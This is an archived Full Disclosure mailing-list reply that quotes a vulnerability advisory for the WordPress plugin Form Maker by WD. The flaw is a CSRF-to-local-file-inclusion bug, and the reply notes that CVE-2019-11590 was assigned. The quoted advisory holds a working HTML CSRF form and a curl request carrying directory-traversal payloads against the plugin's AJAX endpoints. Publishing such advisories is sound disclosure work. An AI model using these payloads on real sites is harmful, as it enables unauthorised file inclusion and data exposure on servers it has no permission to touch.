<!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="35"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#36">By Date</a>
<a href="37"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="10"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#36">By Thread</a>
<a href="11"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>
</div>
<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">Re: WordPress Plugin Form Maker by WD [CSRF → LFI]</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->
<em>From</em>: Henri Salo <henri () nerv fi>
<em>Date</em>: Mon, 29 Apr 2019 18:07:27 +0300
<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
On Fri, Apr 05, 2019 at 02:01:21PM +0300, Panagiotis Vagenas wrote:
</pre><blockquote style="border-left: #5555EE solid 0.2em; margin: 0em; padding-left: 0.85em"><pre style="margin: 0em;"># Exploit Title: Form Maker by WD [CSRF → LFI]
# Date: 2019-03-17
# Exploit Author: Panagiotis Vagenas
# Vendor Homepage: <a rel="nofollow" href="http://web-dorado.com/">http://web-dorado.com/</a>
# Software Link: <a rel="nofollow" href="https://wordpress.org/plugins/form-maker">https://wordpress.org/plugins/form-maker</a>
# Version: 1.13.2
# Tested on: WordPress 5.1
Description
-----------
Plugin implements the following AJAX actions:
- `generete_csv`
- `generete_xml`
- `formmakerwdcaptcha`
- `formmakerwdmathcaptcha`
- `product_option`
- `FormMakerEditCountryinPopup`
- `FormMakerMapEditinPopup`
- `FormMakerIpinfoinPopup`
- `show_matrix`
- `FormMakerSubmits`
- `FormMakerSQLMapping`
- `select_data_from_db`
- `manage_fm`
- `FMShortocde`
All of them call the function `form_maker_ajax`. This function
dynamicaly loads a file defined in `$_GET['action']` or
`$_POST['action']` if the former is not defined. Because of the way
WordPress defines the AJAX action a user could define the plugin action
in the `$_GET['action']` and AJAX action in `$_POST['action']`.
Leveraging that and the fact that no sanitization is performed on the
`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
file using directory traversal thus leading to Local File Inclusion
vulnerability.
Plugin also registers the following AJAX actions:
- `paypal_info`
- `checkpaypal`
Those seems like the are only available to PRO version users, yet they
also are vulnerable to this attack.
Additionally the following AJAX actions are registered in PRO version:
- `get_frontend_stats`
- `frontend_show_map`
- `frontend_show_matrix`
- `frontend_paypal_info`
- `frontend_generate_csv`
- `frontend_generate_xml`
Those have the function `form_maker_ajax_frontend` as a callback. All of
them are vulnerable to the aforementioned attack. What's more
interesting about those is the fact that are available to non-registered
users also, making this attack directly exploitable, without using a
CSRF attack. In this case the vulnerable param is `$_REQUEST['page']`.
PoC
---
### Using a CSRF attack
```html
<form method="post"
action="<a rel="nofollow" href="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php?action=/../../../../../index"">http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php?action=/../../../../../index"</a>;>
<label>AJAX action:
<select name="action">
<optgroup label="Free version">
<option value="generete_csv">generete_csv</option>
<option value="generete_xml">generete_xml</option>
<option
value="formmakerwdcaptcha">formmakerwdcaptcha</option>
<option
value="formmakerwdmathcaptcha">formmakerwdmathcaptcha</option>
<option value="product_option">product_option</option>
<option
value="FormMakerEditCountryinPopup">FormMakerEditCountryinPopup</option>
<option
value="FormMakerMapEditinPopup">FormMakerMapEditinPopup</option>
<option
value="FormMakerIpinfoinPopup">FormMakerIpinfoinPopup</option>
<option value="show_matrix">show_matrix</option>
<option value="FormMakerSubmits">FormMakerSubmits</option>
<option
value="FormMakerSQLMapping">FormMakerSQLMapping</option>
<option
value="select_data_from_db">select_data_from_db</option>
<option value="manage_fm">manage_fm</option>
<option value="FMShortocde">FMShortocde</option>
</optgroup>
<optgroup label="Pro Version">
<option value="paypal_info">paypal_info</option>
<option value="checkpaypal">checkpaypal</option>
<option
value="get_frontend_stats">get_frontend_stats</option>
<option value="frontend_show_map">frontend_show_map</option>
<option
value="frontend_show_matrix">frontend_show_matrix</option>
<option
value="frontend_paypal_info">frontend_paypal_info</option>
<option
value="frontend_generate_csv">frontend_generate_csv</option>
<option
value="frontend_generate_xml">frontend_generate_xml</option>
</optgroup>
</select>
</label>
<button type="submit" value="Submit">Submit</button>
</form>
```
### Without leveraging the CSRF vulnerability
```sh
curl '<a rel="nofollow" href="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php&apos">http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php&apos</a>; \
-d 'action=get_frontend_stats&page=/../../../../../index'
```
</pre></blockquote><pre style="margin: 0em;">
MITRE assigned CVE-2019-11590 for this issue.
- --
Henri Salo
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEE/aVSDznAZReWTkxKJ633pE6qdXQFAlzHEy8ACgkQJ633pE6q
dXTtyQ/+JJ1QE/wVnH1/P0hXKoorU513ycXMHT9MrfMdi2+Y7tA/FJToQFlPAU+n
Uz0K9QJIUjYc/78rat3d9t3j8nJzwY6v+I6r84SMi9inWNsGu/5qVGM8j3YkKW3W
M74h48ZK5H0zytuOjNxWR8EqvpfU3Kb8V1Cd3Ged1VXpgF8Cc8DR+B9biVS7nocI
z/fpHIEYBQ0uf031t+4hMeuQVvGEILhLnByDIYGW7/HeP/n+YXtExy0ClTT3Lvf0
AmkMBoQhsRgb1X8k+3YPe/zw/cWxaRCjaMtjza120P9lUklWEuD0C+xCB05A4T+f
B3wjmtLnyycWNeTazrCnDwnvGtfqm2uorz0Fs1f9k/JJq5GQPfJA8bb+N0Z/i8hR
8gSFgTukkuLUAsC58IDluCqfqQi9XvtFN0Jh0dBXBzvYxSc9b/eVa5SBK71sjCkg
VcYpxPN5DPnVBLdNoRqlsT/5mDC+ZbiyfTPp4jWMgElJIewkfdakXDwEQ2KLKGZG
vhVm6TEvpd9u+I7fl5UcGdSbQNK7aQhlNmKYgq3hp8FKQsnvXN5b5mylTO+2XgqP
f1c6NsS4fkVPkSzre+jbYIBIL04PqGWCx34ldRV4sBCODFOq1v5pnnY05EaqSpRu
MHPyVgAzSPh8GIYS4zksKhPiKwz2TlAuAR11dnoPdTPlSSXGY7I=
=KvTc
-----END PGP SIGNATURE-----
_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives & RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a></pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="35"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#36">By Date</a>
<a href="37"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="10"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#36">By Thread</a>
<a href="11"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><a name="10" href="10">WordPress Plugin Form Maker by WD [CSRF → LFI]</a> <em>Panagiotis Vagenas (Apr 05)</em>
<ul>
<li><strong>Re: WordPress Plugin Form Maker by WD [CSRF → LFI]</strong> <em>Henri Salo (Apr 30)</em>
</li>
</ul>
</li>
</ul>
<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>